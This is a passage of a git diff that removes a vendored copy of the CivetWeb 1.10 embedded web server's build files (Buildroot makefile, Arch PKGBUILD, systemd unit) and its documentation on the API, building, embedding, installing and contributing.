-CIVETWEB_SYSCONFDIR = /etc
-CIVETWEB_HTMLDIR = /var/www
-
-ifneq ($(BR2_LARGEFILE),y)
-	CIVETWEB_COPT += -DSQLITE_DISABLE_LFS
-endif
-
-ifeq ($(BR2_INET_IPV6),y)
-	CIVETWEB_CONF_OPT += WITH_IPV6=1
-endif
-
-ifeq ($(BR2_CIVETWEB_WITH_LUA),y)
-	CIVETWEB_CONF_OPT += WITH_LUA=1
-endif
-
-ifeq ($(BR2_PACKAGE_OPENSSL),y)
-	CIVETWEB_COPT += -DNO_SSL_DL -lcrypt -lssl
-	CIVETWEB_DEPENDENCIES += openssl
-else
-	CIVETWEB_COPT += -DNO_SSL
-endif
-
-define CIVETWEB_BUILD_CMDS
-	$(MAKE) CC="$(TARGET_CC)" -C $(@D) build \
-		$(CIVETWEB_CONF_OPT) \
-		COPT="$(CIVETWEB_COPT)"
-endef
-
-define CIVETWEB_INSTALL_TARGET_CMDS
-	$(MAKE) CC="$(TARGET_CC)" -C $(@D) install \
-		DOCUMENT_ROOT="$(CIVETWEB_HTMLDIR)" \
-		CONFIG_FILE2="$(CIVETWEB_SYSCONFDIR)/civetweb.conf" \
-		HTMLDIR="$(TARGET_DIR)$(CIVETWEB_HTMLDIR)" \
-		SYSCONFDIR="$(TARGET_DIR)$(CIVETWEB_SYSCONFDIR)" \
-		PREFIX="$(TARGET_DIR)/usr" \
-		$(CIVETWEB_CONF_OPT) \
-		COPT='$(CIVETWEB_COPT)'
-endef
-
-$(eval $(generic-package))
-
diff --git a/thirdparty/civetweb-1.10/distribution/arch/PKGBUILD.git.example b/thirdparty/civetweb-1.10/distribution/arch/PKGBUILD.git.example
deleted file mode 100644
index 7102bcb..0000000
--- a/thirdparty/civetweb-1.10/distribution/arch/PKGBUILD.git.example
+++ /dev/null
@@ -1,42 +0,0 @@
-# An example PKGBUILD script for Civetweb upstream, git version
-# Rename to PKGBUILD to build via makepkg
-_pkgname=civetweb
-pkgname=$_pkgname-git
-pkgver=v1.4.24.g73c40b6
-pkgrel=1
-pkgdesc="Small and quick-to-use web server; https/php/cgi support; MIT license - git development version"
-arch=('i686' 'x86_64')
-url="http://sourceforge.net/p/civetweb/"
-license=('MIT')
-groups=()
-depends=()
-makedepends=('git sed')
-optdepends=('php-cgi: for php support')
-provides=("$_pkgname")
-conflicts=("$_pkgname")
-backup=("etc/$_pkgname/$_pkgname.conf")
-source=("$_pkgname::git+https://github.com/civetweb/civetweb.git")
-md5sums=('SKIP')
-
-pkgver() {
-  cd "$srcdir/$_pkgname"
-  git describe --tags | sed 's|-|.|g'
-}
-
-build() {
-  cd "$srcdir/$_pkgname"
-  make build WITH_IPV6=1
-}
-
-package() {
-  cd "$srcdir/$_pkgname"
-  make install PREFIX="$pkgdir/usr" SYSCONFDIR="$pkgdir/etc/local/$_pkgname"
-  
-  install -Dm644 "$srcdir/$_pkgname/distribution/arch/$_pkgname.service" "$pkgdir/usr/lib/systemd/system/$_pkgname.service"
-
-  sed -i "s/^document_root [^\n]*/document_root \/srv\/http/g" "$pkgdir/etc/local/$_pkgname/$_pkgname.conf"
-  sed -i "s/^# access_log_file/access_log_file \/var\/log\/$_pkgname\/access.log/g" "$pkgdir/etc/local/$_pkgname/$_pkgname.conf"
-  sed -i "s/^# error_log_file/access_log_file \/var\/log\/$_pkgname\/error.log/g" "$pkgdir/etc/local/$_pkgname/$_pkgname.conf"
-}
-
-# vim:set ts=2 sw=2 et:
diff --git a/thirdparty/civetweb-1.10/distribution/arch/civetweb.service b/thirdparty/civetweb-1.10/distribution/arch/civetweb.service
deleted file mode 100644
index 5327b6c..0000000
--- a/thirdparty/civetweb-1.10/distribution/arch/civetweb.service
+++ /dev/null
@@ -1,9 +0,0 @@
-[Unit]
-Description=Civetweb httpd
-After=syslog.target network.target remote-fs.target nss-lookup.target
-
-[Service]
-ExecStart=/usr/local/bin/civetweb /usr/local/etc/civetweb/civetweb.conf
-
-[Install]
-WantedBy=multi-user.target
diff --git a/thirdparty/civetweb-1.10/docs/APIReference.md b/thirdparty/civetweb-1.10/docs/APIReference.md
deleted file mode 100644
index 58c2faf..0000000
--- a/thirdparty/civetweb-1.10/docs/APIReference.md
+++ /dev/null
@@ -1,134 +0,0 @@
-# CivetWeb API Reference
-
-CivetWeb is often used as HTTP and HTTPS library inside a larger application.
-A C API is available to integrate the CivetWeb functionality in a larger
-codebase. A C++ wrapper is also available, although it is not guaranteed
-that all functionality available through the C API can also be accessed
-from C++. This document describes the public C API. Basic usage examples of
-the API can be found in [Embedding.md](Embedding.md), as well as in the
-examples directory.
-
-## Macros
-
-| Macro | Description |
-| :--- | :--- |
-| **`CIVETWEB_VERSION`** | The current version of the software as a string with the major and minor version number seperated with a dot. For version 1.9, this string will have the value "1.9", for thw first patch of this version "1.9.1". |
-| **`CIVETWEB_VERSION_MAJOR`** | The current major version as number, e.g., (1) for version 1.9. |
-| **`CIVETWEB_VERSION_MINOR`** | The current minor version as number, e.g., (9) for version 1.9. |
-| **`CIVETWEB_VERSION_PATCH`** | The current patch version as number, e.g., (0) for version 1.9 or (1) for version 1.9.1. |
-
-## Handles
-
-* `struct mg_context *`
-Handle for one instance of the HTTP(S) server.
-All functions using `const struct mg_context *` as an argument do not modify a running server instance, but just query information. Functions using a non-const `struct mg_context *` as an argument may modify a server instance (e.g., register a new URI, stop the server, ...).
-
-* `struct mg_connection *`
-Handle for one individual client-server connection.
-Functions working with `const struct mg_connection *` operate on data already known to the server without reading data from or sending data to the client. Callbacks using a `const struct mg_connection *` argument are supposed to not call functions from the `mg_read()` and `mg_write()` family. To support a correct application, reading and writing functions require a non-const `struct mg_connection *` connection handle.
-
-The content of both structures is not defined in the interface - they are only used as opaque pointers (handles).
-
-## Structures
-
-* [`struct mg_client_cert;`](api/mg_client_cert.md)
-* [`struct mg_client_options;`](api/mg_client_options.md)
-* [`struct mg_callbacks;`](api/mg_callbacks.md)
-* [`struct mg_form_data_handler;`](api/mg_form_data_handler.md)
-* [`struct mg_header;`](api/mg_header.md)
-* [`struct mg_option;`](api/mg_option.md)
-* [`struct mg_request_info;`](api/mg_request_info.md)
-* [`struct mg_server_ports;`](api/mg_server_ports.md)
-
-
-## Library API Functions
-
-* [`mg_init_library( feature );`](api/mg_init_library.md)
-* [`mg_exit_library( feature );`](api/mg_exit_library.md)
-
-* [`mg_check_feature( feature );`](api/mg_check_feature.md)
-* [`mg_version();`](api/mg_version.md)
-
-
-## Server API Functions
-
-* [`mg_start( callbacks, user_data, options );`](api/mg_start.md)
-* [`mg_stop( ctx );`](api/mg_stop.md)
-
-* [`mg_get_builtin_mime_type( file_name );`](api/mg_get_builtin_mime_type.md)
-* [`mg_get_option( ctx, name );`](api/mg_get_option.md)
-* [`mg_get_server_ports( ctx, size, ports );`](api/mg_get_server_ports.md)
-* [`mg_get_user_data( ctx );`](api/mg_get_user_data.md)
-* [`mg_set_auth_handler( ctx, uri, handler, cbdata );`](api/mg_set_auth_handler.md)
-* [`mg_set_request_handler( ctx, uri, handler, cbdata );`](api/mg_set_request_handler.md)
-* [`mg_set_websocket_handler( ctx, uri, connect_handler, ready_handler, data_handler, close_handler, cbdata );`](api/mg_set_websocket_handler.md)
-
-* [`mg_lock_context( ctx );`](api/mg_lock_context.md)
-* [`mg_unlock_context( ctx );`](api/mg_unlock_context.md)
-
-* [`mg_get_context( conn );`](api/mg_get_context.md)
-
-* [`mg_send_http_error( conn, status_code, fmt, ... );`](api/mg_send_http_error.md)
-
-* [`mg_send_digest_access_authentication_request( conn, realm );`](api/mg_send_digest_access_authentication_request.md)
-* [`mg_check_digest_access_authentication( conn, realm, filename );`](api/mg_check_digest_access_authentication.md)
-* [`mg_modify_passwords_file( passwords_file_name, realm, user, password );`](api/mg_modify_passwords_file.md)
-
-
-## Client API Functions
-
-* [`mg_connect_client( host, port, use_ssl, error_buffer, error_buffer_size );`](api/mg_connect_client.md)
-* [`mg_connect_websocket_client( host, port, use_ssl, error_buffer, error_buffer_size, path, origin, data_func, close_func, user_data);`](api/mg_connect_websocket_client.md)
-* [`mg_websocket_client_write( conn, opcode, data, data_len );`](api/mg_websocket_client_write.md)
-
-* [`mg_download( host, port, use_ssl, error_buffer, error_buffer_size, fmt, ... );`](api/mg_download.md)
-
-
-## Common API Functions
-
-* [`mg_close_connection( conn );`](api/mg_close_connection.md)
-* [`mg_cry( conn, fmt, ... );`](api/mg_cry.md)
-
-* [`mg_get_cookie( cookie, var_name, buf, buf_len );`](api/mg_get_cookie.md)
-* [`mg_get_header( conn, name );`](api/mg_get_header.md)
-* [`mg_get_request_info( conn );`](api/mg_get_request_info.md)
-* [`mg_get_response( conn, ebuf, ebuf_len, timeout );`](api/mg_get_response.md)
-* [`mg_get_response_code_text( conn, response_code );`](api/mg_get_response_code_text.md)
-* [`mg_get_user_connection_data( conn );`](api/mg_get_user_connection_data.md)
-* [`mg_get_valid_options();`](api/mg_get_valid_options.md)
-* [`mg_get_var( data, data_len, var_name, dst, dst_len );`](api/mg_get_var.md)
-* [`mg_get_var2( data, data_len, var_name, dst, dst_len, occurrence );`](api/mg_get_var2.md)
-* [`mg_handle_form_request( conn, fdh );`](api/mg_handle_form_request.md)
-* [`mg_lock_connection( conn );`](api/mg_lock_connection.md)
-* [`mg_md5( buf, ... );`](api/mg_md5.md)
-* [`mg_printf( conn, fmt, ... );`](api/mg_printf.md)
-* [`mg_read( conn, buf, len );`](api/mg_read.md)
-* [`mg_send_chunk( conn, buf, len );`](api/mg_send_chunk.md)
-* [`mg_send_file( conn, path );`](api/mg_send_file.md)
-* [`mg_send_mime_file( conn, path, mime_type );`](api/mg_send_mime_file.md)
-* [`mg_send_mime_file2( conn, path, mime_type, additional_headers );`](api/mg_send_mime_file2.md)
-* [`mg_set_user_connection_data( conn, data );`](api/mg_set_user_connection_data.md)
-* [`mg_start_thread( f, p );`](api/mg_start_thread.md)
-* [`mg_store_body( conn, path );`](api/mg_store_body.md)
-* [`mg_strcasecmp( s1, s2 );`](api/mg_strcasecmp.md)
-* [`mg_strncasecmp( s1, s2, len );`](api/mg_strncasecmp.md)
-* [`mg_unlock_connection( conn );`](api/mg_unlock_connection.md)
-* [`mg_url_decode( src, src_len, dst, dst_len, is_form_url_encoded );`](api/mg_url_decode.md)
-* [`mg_url_encode( src, dst, dst_len );`](api/mg_url_encode.md)
-* [`mg_websocket_write( conn, opcode, data, data_len );`](api/mg_websocket_write.md)
-* [`mg_write( conn, buf, len );`](api/mg_write.md)
-
-
-## Diagnosis Functions
-
-* [`mg_get_system_info( buffer, buf_len );`](api/mg_get_system_info.md)
-* [`mg_get_context_info( ctx, buffer, buf_len );`](api/mg_get_context_info.md)
-* [`mg_get_connection_info( ctx, idx, buffer, buf_len );`](api/mg_get_context_info.md)
-
-
-## Deprecated:
-
-* [~~`mg_get_valid_option_names();`~~](api/mg_get_valid_option_names.md)
-* [~~`mg_upload( conn, destination_dir );`~~](api/mg_upload.md)
-
-
diff --git a/thirdparty/civetweb-1.10/docs/Building.md b/thirdparty/civetweb-1.10/docs/Building.md
deleted file mode 100644
index 9d7b56f..0000000
--- a/thirdparty/civetweb-1.10/docs/Building.md
+++ /dev/null
@@ -1,216 +0,0 @@
-Building CivetWeb
-=========
-
-This guide covers the build instructions for the stand-alone web server.
-See [Embedding.md](https://github.com/civetweb/civetweb/blob/master/docs/Embedding.md) for information on extending an existing C or C++ application. A brief overview of the source code files can be found in [Embedding.md](https://github.com/civetweb/civetweb/blob/master/docs/Embedding.md) as well.
-
-#### Where to get the source code?
-
-The latest version can be found at
-https://github.com/civetweb/civetweb
-
-Released versions can be found at
-https://github.com/civetweb/civetweb/releases
-
-
-Building for Windows
----------
-
-#### Using Visual Studio
-
-Open the *VS/civetweb.sln* in Visual Studio.
-To include SSL support, you may have to add an extra library for the cryptography support. You might wish to use yaSSL.  However, it is GPL licensed or uses a commercial license. See [yaSSL.md](https://github.com/civetweb/civetweb/blob/master/docs/yaSSL.md) for more information.
-Alternatively, you might wish to use OpenSSL. See [OpenSSL.md](https://github.com/civetweb/civetweb/blob/master/docs/OpenSSL.md) for more information.
-
-#### Using MinGW-w64 or TDM-GCC
-In the start menu locate and run the "Run terminal" batch file. For TDM-GCC this is named "MinGW Command Prompt".
-Navigate to the civetweb sources directory and run:
-```
-mingw32-make CC=gcc
-```
-
-#### Using Qt Creator
-Open the Qt Designer project in the Qt folder
-
-#### Using CMake
-Except for the components in the `third_party` folder (e.g., Lua and Duktape), CivetWeb can also be built with CMake.
-CMake can be used for all supported operating systems.
-
-
-Building for Linux, BSD, and OSX
----------
-
-## Using Make
-
-```
-make help
-```
-Get a list of all supported make option
-
-```
-make build
-```
-compile the code
-
-```
-make install
-```
-Install on the system, Linux only.
-
-```
-make lib WITH_CPP=1 WITH_IPV6=1
-make clean slib WITH_CPP=1 WITH_LUA=1 WITH_WEBSOCKET=1
-```
-Build the static and shared libraries.
-The *WITH_CPP* make option is to include the CivetServer class.
-The additional make options configure the library just as it would the application.
-
-The *slib* option should be done on a separate clean build as position
-independent code (PIC) is required for it.  Trying to run it after
-building the static library or the server will result in a link error.
-
-```
-make clean
-```
-Clean up files generated during the build
-
-## Setting build options
-
-Make options can be set on the command line with the make command like so.
-```
-make build WITH_LUA=1
-```
-
-
-| Make Options              | Description                               |
-| ------------------------- | ----------------------------------------- |
-| WITH_LUA=1                | build with Lua support                    |
-| WITH_DUKTAPE=1            | build with server-side JavaScript support |
-| WITH_DEBUG=1              | build with GDB debug support              |
-| WITH_IPV6=1               | with IPV6 support                         |
-| WITH_WEBSOCKET=1          | build with web socket support             |
-| WITH_SERVER_STATS=1       | build with support for server statistics  |
-| WITH_CPP=1                | build libraries with c++ classes          |
-| CONFIG_FILE=file          | use 'file' as the config file             |
-| CONFIG_FILE2=file         | use 'file' as the backup config file      |
-| HTMLDIR=/path             | place to install initial web pages        |
-| DOCUMENT_ROOT=/path       | HTMLDIR override, config option, install  |
-|                           | nothing is installed here.                |
-| PORTS=8080                | listening ports override when installing  |
-| SSL_LIB=libssl.so.0       | use versioned SSL library                 |
-| CRYPTO_LIB=libcrypto.so.0 | system versioned CRYPTO library           |
-| PREFIX=/usr/local         | sets the install directory                |
-| COPT='-DNO_SSL'           | method to insert compile flags            |
-
-Note that the WITH_* options used for *make* are not identical to the
-preprocessor defines in the source code - usually USE_* is used there.
-
-## Changing PREFIX
-
-To change the target destination pass the `PREFIX` option to the command `make install` (not `make build`). Example usage:
-
-```
-$ make build
-$ make -n install PREFIX=/opt/civetweb
-```
-Note: The `-n` corresponds to the `--dry-run` option (it does not make any changes): You can see where `make install` would install. Example output of the above command:
-
-```
-$ make -n install PREFIX=/opt/civetweb
-install -d -m 755  "/opt/civetweb/share/doc/civetweb"
-install -m 644 resources/itworks.html /opt/civetweb/share/doc/civetweb/index.html
-install -m 644 resources/civetweb_64x64.png /opt/civetweb/share/doc/civetweb/
-install -d -m 755  "/opt/civetweb/etc"
-install -m 644 resources/civetweb.conf  "/opt/civetweb/etc/"
-sed -i 's#^document_root.*$#document_root /opt/civetweb/share/doc/civetweb#' "/opt/civetweb/etc/civetweb.conf"
-sed -i 's#^listening_ports.*$#listening_ports 8080#' "/opt/civetweb/etc/civetweb.conf"
-install -d -m 755  "/opt/civetweb/share/doc/civetweb"
-install -m 644 *.md "/opt/civetweb/share/doc/civetweb"
-install -d -m 755 "/opt/civetweb/bin"
-install -m 755 civetweb "/opt/civetweb/bin/"
-```
-
-If the output looks good: Just remove the `-n` option to actually install the software on your system.
-
-## Setting compile flags
-
-Compile flags can be set using the *COPT* make option like so.
-```
-make build COPT="-DNDEBUG -DNO_CGI"
-```
-
-| Compile Flags             | Description                          |
-| ------------------------- | ------------------------------------ |
-| NDEBUG                    | strip off all debug code             |
-| DEBUG                     | build debug version (very noisy)     |
-| NO_CGI                    | disable CGI support                  |
-| NO_CACHING                | disable caching functionality        |
-| NO_SSL                    | disable SSL functionality            |
-| NO_SSL_DL                 | link against system libssl library   |
-| NO_FILES                  | do not serve files from a directory  |
-| SQLITE_DISABLE_LFS        | disables large files (Lua only)      |
-| SSL_ALREADY_INITIALIZED   | do not initialize libcrypto          |
-
-## Cross Compiling
-
-Take total control with *CC*, *COPT* and *TARGET_OS* as make options.
-TARGET_OS is used to determine some compile details as will as code function.
-TARGET_OS values should be be one found in *resources/Makefile.in-os*.
-
-```
-make CC=arm-none-linux-gnueabi-gcc COPT="-march=armv7-a  -mfpu=vfp -mfloat-abi=softfp" TARGET_OS=FROG
-```
-
-## Cocoa DMG Packaging (OSX Only)
-
-Use the alternate *Makefile.osx* to do the build.  The entire build has
-to be done using *Makefile.osx* because additional compile and link options
-are required.  This Makefile has all the same options as the other one plus
-one additional *package* rule.
-
-```
-make -f Makefile.osx package
-```
-
-Building with Buildroot
----------
-
-[Buildroot](http://buildroot.uclibc.org/) is a tool for creating cross compiled file systems.  Including Civetweb in buildroot is fairly easy.  There is even support for various build options.
-
-1. First, check if it already there.
-  - In buildroot, make menuconfig
-     - Package Selection for the target --->
-     - Networking applications  --->
-     - civetweb
-2. If not there, just add it
-  - copy *Config.in* and *civetweb.mk* from Civetweb's *contrib/buildroot/* to Buildroot's *package/civetweb/* directory.
-  - In Buildroot's *package/Config.in, insert the following line in were you will know how to find it in the menu.
-    > ``` source "package/civetweb/Config.in" ```
-
-
-Building on Android
----------
-
-This is a small guide to help you run civetweb on Android, originally
-tested on the HTC Wildfire.
-Note: You do not need root access to run civetweb on Android.
-
-- Download the source from the Downloads page.
-- Download the Android NDK from [http://developer.android.com/tools/sdk/ndk/index.html](http://developer.android.com/tools/sdk/ndk/index.html)
-- Run `/path-to-ndk/ndk-build -C /path-to-civetweb/resources`
-  That should generate civetweb/lib/armeabi/civetweb
-- Using the adb tool (you need to have Android SDK installed for that),
-  push the generated civetweb binary to `/data/local` folder on device.
-- From adb shell, navigate to `/data/local` and execute `./civetweb`.
-- To test if the server is running fine, visit your web-browser and
-  navigate to `http://127.0.0.1:8080` You should see the `Index of /` page.
-
-
-Notes:
-
-- `jni` stands for Java Native Interface. Read up on Android NDK if you want
-  to know how to interact with the native C functions of civetweb in Android
-  Java applications.
-
-
-
diff --git a/thirdparty/civetweb-1.10/docs/Contribution.md b/thirdparty/civetweb-1.10/docs/Contribution.md
deleted file mode 100644
index aa88c14..0000000
--- a/thirdparty/civetweb-1.10/docs/Contribution.md
+++ /dev/null
@@ -1,23 +0,0 @@
-Contributing to CivetWeb
-====
-
-Contributions to CivetWeb are welcome, provided all contributions carry the MIT license.
-
-- Please report issues on GitHub. If the issue you want to report is already reported there, add a note with your specific details to that issue. In case of doubt, please create a new issue.
-- If you know how to fix the issue, please create a pull request on GitHub. Please take care your modifications pass the continuous integration checks. These checks are performed automatically when you create a pull request, but it may take some hours until all tests are completed. Please provide a description for every pull request.
-- Alternatively, you can post a patch or describe the required modifications in a GitHub issue.
-However, a pull request would be preferred.
-- Contributor names are listed in CREDITS.md, unless you explicitly state you don't want your name to be listed there. This file is occasionally updated, adding new contributors, using author names from git commits and GitHub comments.
-
-
-- In case your modifications either
-  1. modify or extend the API,
-  2. affect multi-threading,
-  3. imply structural changes,
-  or
-  4. have significant influence on maintenance,
-  
-  please first create an issue on GitHub or create a thread on the CivetWeb discussion group, to discuss the planned changed.
-
-- In case you think you found a security issue that should be evaluated and fixed before public disclosure, feel free to write an email.  Although CivetWeb is a fork from Mongoose from 2013, the code bases are different now, so security vulnerabilities of Mongoose usually do not affect CivetWeb.  Open an issue for Mongoose vulnerabilities you want to have checked if CivetWeb is affected.
-
diff --git a/thirdparty/civetweb-1.10/docs/Embedding.md b/thirdparty/civetweb-1.10/docs/Embedding.md
deleted file mode 100644
index 0ffbc23..0000000
--- a/thirdparty/civetweb-1.10/docs/Embedding.md
+++ /dev/null
@@ -1,260 +0,0 @@
-Embedding CivetWeb
-=========
-
-CivetWeb is primarily designed so applications can easily add HTTP and HTTPS server as well as WebSocket functionality.  For example, an application server could use CivetWeb to enable a web service interface for automation or remote control.
-
-However, it can also be used as a stand-alone executable. It can deliver static files and offers built-in server side Lua, JavaScript and CGI support. Some instructions how to build the stand-alone server can be found in [Building.md](https://github.com/civetweb/civetweb/blob/master/docs/Building.md).
-
-Files
-------
-
-There is just a small set of files to compile in to the application,
-but if a library is desired, see [Building.md](https://github.com/CivetWeb/CivetWeb/blob/master/docs/Building.md)
-
-#### Regarding the INL file extension
-The *INL* file extension represents code that is statically included inline in a source file.  Slightly different from C++ where it means "inline" code which is technically not the same as static code. CivetWeb overloads this extension for the sake of clarity as opposed to having .c extensions on files that should not be directly compiled.
-
-#### HTTP Server Source Files
-
-These files constitute the CivetWeb library.  They do not contain a `main` function,
-but all functions required to run a HTTP server.
-
-  - HTTP server API
-    - include/civetweb.h
-  - C implementation
-    - src/civetweb.c
-    - src/md5.inl (MD5 calculation)
-    - src/sha1.inl (SHA calculation)
-    - src/handle\_form.inl (HTML form handling functions)
-    - src/timer.inl (optional timer support)
-  - Optional: C++ wrapper
-    - include/CivetServer.h (C++ interface)
-    - src/CivetServer.cpp (C++ wrapper implementation)
-  - Optional: Third party components
-    - src/third\_party/* (third party components, mainly used for the standalone server)
-    - src/mod\_*.inl (modules to access third party components from civetweb)
-
-
-Note: The C++ wrapper uses the official C interface (civetweb.h) and does not add new features to the server. Several features available in the C interface are missing in the C++ interface. While all features should be accessible using the C interface, this is not a design goal of the C++ interface.
-
-
-#### Additional Source Files for Executables
-
-These files can be used to build a server executable. They contain a `main` function
-starting the HTTP server.
-
-  - Stand-alone C Server
-      - src/main.c
-  - Reference embedded C Server
-      - examples/embedded\_c/embedded\_c.c
-  - Reference embedded C++ Server
-      - examples/embedded\_cpp/embedded\_cpp.cpp
-
-Note: The "embedded" example is actively maintained, updated, extended and tested. Other examples in the examples/ folder might be outdated and remain there for reference.
-
-
-Quick Start
-------
-
-By default, the server will automatically serve up files like a normal HTTP server.  An embedded server is most likely going to overload this functionality.
-
-### C
-  - Include the C interface ```civetweb.h```.
-  - Use `mg_start()` to start the server.
-      - Use *options* to select the port and document root among other things.
-      - Use *callbacks* to add your own hooks.
-  - Use `mg_set_request_handler()` to easily add your own request handlers.
-  - Use `mg_stop()` to stop the server.
-
-### C++
-  - Note that CivetWeb is Clean C, and C++ interface ```CivetServer.h``` is only a wrapper layer around the C interface.
-    Not all CivetWeb features available in C are also available in C++.
-  - Create CivetHandlers for each URI.
-  - Register the handlers with `CivetServer::addHandler()`
-  - `CivetServer` starts on contruction and stops on destruction.
-  - Use contructor *options* to select the port and document root among other things.
-  - Use constructor *callbacks* to add your own hooks.
-
-Alternative quick start: Have a look at the examples embedded\_c and embedded\_cpp
-
-
-Lua Support
-------
-
-Lua is a server side include functionality.  Files ending in .lua will be processed with Lua.
-
-##### Add the following CFLAGS
-
-  - `-DLUA_COMPAT_ALL`
-  - `-DUSE_LUA`
-  - `-DUSE_LUA_SQLITE3`
-  - `-DUSE_LUA_FILE_SYSTEM`
-
-##### Add the following sources
-
-  - src/mod\_lua.inl
-  - src/third\_party/lua-5.2.4/src
-     + lapi.c
-     + lauxlib.c
-     + lbaselib.c
-     + lbitlib.c
-     + lcode.c
-     + lcorolib.c
-     + lctype.c
-     + ldblib.c
-     + ldebug.c
-     + ldo.c
-     + ldump.c
-     + lfunc.c
-     + lgc.c
-     + linit.c
-     + liolib.c
-     + llex.c
-     + lmathlib.c
-     + lmem.c
-     + loadlib.c
-     + lobject.c
-     + lopcodes.c
-     + loslib.c
-     + lparser.c
-     + lstate.c
-     + lstring.c
-     + lstrlib.c
-     + ltable.c
-     + ltablib.c
-     + ltm.c
-     + lundump.c
-     + lvm.c
-     + lzio.c
-  - src/third\_party/sqlite3.c
-  - src/third\_party/sqlite3.h
-  - src/third\_party/lsqlite3.c
-  - src/third\_party/lfs.c
-  - src/third\_party/lfs.h
-
-This build is valid for Lua version Lua 5.2. It is also possible to build with Lua 5.1 (including LuaJIT) or Lua 5.3.
-
-
-JavaScript Support
-------
-
-CivetWeb can be built with server side JavaScript support by including the Duktape library.
-
-
-CivetWeb internals
-------
-
-CivetWeb is multithreaded web server. `mg_start()` function allocates
-web server context (`struct mg_context`), which holds all information
-about web server instance:
-
-- configuration options. Note that CivetWeb makes internal copies of
-  passed options.
-- SSL context, if any
-- user-defined callbacks
-- opened listening sockets
-- a queue for accepted sockets
-- mutexes and condition variables for inter-thread synchronization
-
-When `mg_start()` returns, all initialization is guaranteed to be complete
-(e.g. listening ports are opened, SSL is initialized, etc). `mg_start()` starts
-some threads: a master thread, that accepts new connections, and several
-worker threads, that process accepted connections. The number of worker threads
-is configurable via `num_threads` configuration option. That number puts a
-limit on number of simultaneous requests that can be handled by CivetWeb.
-If you embed CivetWeb into a program that uses SSL outside CivetWeb as well,
-you may need to initialize SSL before calling `mg_start()`, and set the pre-
-processor define `SSL_ALREADY_INITIALIZED`. This is not required if SSL is
-used only within CivetWeb.
-
-When master thread accepts new a connection, a new accepted socket (described
-by `struct socket`) it placed into the accepted sockets queue,
-which has size of `MGSQLEN` (default 20).
-Any idle worker thread can grab accepted sockets from that queue.
-If all worker threads are busy, master thread can accept and queue up to
-20 more TCP connections, filling up the queue.
-In the attempt to queue even more accepted connection, the master thread blocks
-until there is space in the queue. When the master thread is blocked on a
-full queue, the operating system can also queue incoming connection.
-The number is limited by the `listen()` call parameter,
-which is `SOMAXCONN` and depends on the platform.
-
-Worker threads are running in an infinite loop, which in a simplified form
-looks something like this:
-
-```C
-    static void *worker_thread() {
-      while (consume_socket()) {
-        process_new_connection();
-      }
-    }
-```
-
-Function `consume_socket()` gets a new accepted socket from the CivetWeb socket
-queue, atomically removing it from the queue. If the queue is empty,
-`consume_socket()` blocks and waits until a new socket is placed in the queue
-by the master thread.
-
-`process_new_connection()` actually processes the
-connection, i.e. reads the request, parses it, and performs appropriate action
-depending on the parsed request.
-
-Master thread uses `poll()` and `accept()` to accept new connections on
-listening sockets. `poll()` is used to avoid `FD_SETSIZE` limitation of
-`select()`. Since there are only a few listening sockets, there is no reason
-to use hi-performance alternatives like `epoll()` or `kqueue()`. Worker
-threads use blocking IO on accepted sockets for reading and writing data.
-All accepted sockets have `SO_RCVTIMEO` and `SO_SNDTIMEO` socket options set
-(controlled by the `request_timeout_ms` CivetWeb option, 30 seconds default)
-which specifies a read/write timeout on client connections.
-
-
-A minimal example
-------
-
-Initializing a HTTP server
-```C
-{
-    /* Server context handle */
-    struct mg_context *ctx;
-
-    /* Initialize the library */
-    mg_init_library(0);
-
-    /* Start the server */
-    ctx = mg_start(NULL, 0, NULL);
-
-    /* Add some handler */
-    mg_set_request_handler(ctx, "/hello", handler, "Hello world");
-
-    ... Run the application ...
-    
-    /* Stop the server */
-    mg_stop(ctx);
-
-    /* Un-initialize the library */
-    mg_exit_library();
-}
-```
-
-A simple callback
-```C
-static int
-handler(struct mg_connection *conn, void *ignored)
-{
-	const char *msg = "Hello world";
-	unsigned long len = (unsigned long)strlen(msg);
-
-	mg_printf(conn,
-	          "HTTP/1.1 200 OK\r\n"
-	          "Content-Length: %lu\r\n"
-	          "Content-Type: text/plain\r\n"
-	          "Connection: close\r\n\r\n",
-	          len);
-
-	mg_write(conn, msg, len);
-
-	return 200;
-}
-```
-
diff --git a/thirdparty/civetweb-1.10/docs/Installing.md b/thirdparty/civetweb-1.10/docs/Installing.md
deleted file mode 100644
index 2476b94..0000000
--- a/thirdparty/civetweb-1.10/docs/Installing.md
+++ /dev/null
@@ -1,38 +0,0 @@
-Civetweb Install Guide
-====
-
-This guide covers the distributions for CivetWeb.  The latest source code is available at [https://github.com/civetweb/civetweb](https://github.com/civetweb/civetweb).
-
-Windows
----
-
-This pre-built version comes pre-built wit Lua support. Libraries for SSL support are not included due to licensing restrictions;
-however, users may add an SSL library themselves.
-Instructions for adding SSL support can be found in [https://github.com/civetweb/civetweb/tree/master/docs](https://github.com/civetweb/civetweb/tree/master/docs)
-
-1. In case the Visual C++ Redistributable are not already installed:
-  32 Bit Version: Install the [Redistributable for Visual Studio 2010](http://www.microsoft.com/en-us/download/details.aspx?id=8328)
-  64 Bit Version: Install the [Redistributable for Visual Studio 2015](http://www.microsoft.com/en-us/download/details.aspx?id=48145)
-  Note: The required version of the Redistributables may vary, depending on the CivetWeb version.
-2. Download latest *civetweb-win.zip* from [SourceForge](https://sourceforge.net/projects/civetweb/files/)
-3. When started, Civetweb puts itself into the tray.
-
-OS X
----
-
-This pre-built version comes with Lua, IPV6 and SSL support.
-
-1. Download the latest *Civetweb.dmg* from [SourceForge](https://sourceforge.net/projects/civetweb/files/)
-2. Click on the it and look for the attachment in the finder.
-4. Drag Civetweb to the Applications folder.
-5. When started, Civetweb puts itself into top menu.
-
-Linux
----
-
-1. Download the latest *civetweb.tar.gz* from [SourceForge](https://sourceforge.net/projects/civetweb/files/)
-2. Open archive and change to the new directory.
-3. make help
-4. make
-5. make install
-6. Run the program ```/usr/local/bin/civetweb```, it will use the configuration file */usr/local/etc/civetweb.conf*.
diff --git a/thirdparty/civetweb-1.10/docs/Interface_Changes_1.10.md b/thirdparty/civetweb-1.10/docs/Interface_Changes_1.10.md
deleted file mode 100644
index 16bc7dd..0000000
--- a/thirdparty/civetweb-1.10/docs/Interface_Changes_1.10.md
+++ /dev/null
@@ -1,86 +0,0 @@
-# Interface changes
-
-## Proposed interface changes for 1.10
-
-Status: To be discussed
-
-### Server interface
-
-#### mg\_start / mg\_init\_library
-
-Calling mg\_init\_library is recommended before calling mg\_start.
-
-Compatibility:
-Initially, mg\_init\_library will be called implicitly if it has 
-not been called before mg\_start.
-If mg\_init\_library was not called, mg\_stop may leave memory leaks.
-
-#### mg\_websocket\_write functions
-
-Calling mg\_lock\_connection is no longer called implicitly
